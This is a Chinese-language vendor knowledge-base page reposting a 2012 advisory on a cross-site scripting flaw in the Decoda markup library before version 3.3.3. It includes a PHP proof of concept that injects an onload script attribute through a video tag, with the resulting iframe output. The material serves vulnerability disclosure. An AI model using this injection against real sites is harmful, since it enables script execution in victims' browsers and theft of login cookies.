知识学堂
  • ·联系电话:+86.023-75585550
  • ·联系传真:+86.023-75585550
  • ·24小时手机:13896886023
  • ·QQ 咨 询:361652718 513960520
当前位置 > 首页 > 知识学堂 > 常见技术问题
Decoda跨站脚本漏洞
更新时间:2012-05-15 | 发布人:本站 | 点击率:383

 Decoda 3.3.3之前版本中存在跨站脚本漏洞,该漏洞源于对用户提供的输入未经正确过滤。

 
攻击者可利用该漏洞在受影响站点上下文的不知情用户浏览器上执行任意脚本代码,盗取基于cookie的认证证书进而发起其他攻击。
 
目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本
 
可用以下的概念证明型攻击:
 
<?php
include '../decoda/Decoda.php';
$code = new Decoda();
$code->addFilter(new VideoFilter()); ?>
<?php
 
$decoda_markup = '[video="youtube" size="small"]"';
$decoda_markup .= 'onload="alert(\'RedTeam Pentesting XSS\');" id="[/video]';
 
$code->reset($decoda_markup);
echo $code->parse();
?>
 
This results in the following output (whitespace adjusted):
 
<iframe src="http:// www.xxxx.com /embed/"; onload="alert('RedTeam
Pentesting XSS');" id="" width="560" height="315"
frameborder="0"></iframe>
 
 
摘自 90' s Blog 
分享到: QQ空间 新浪微博 开心网 人人网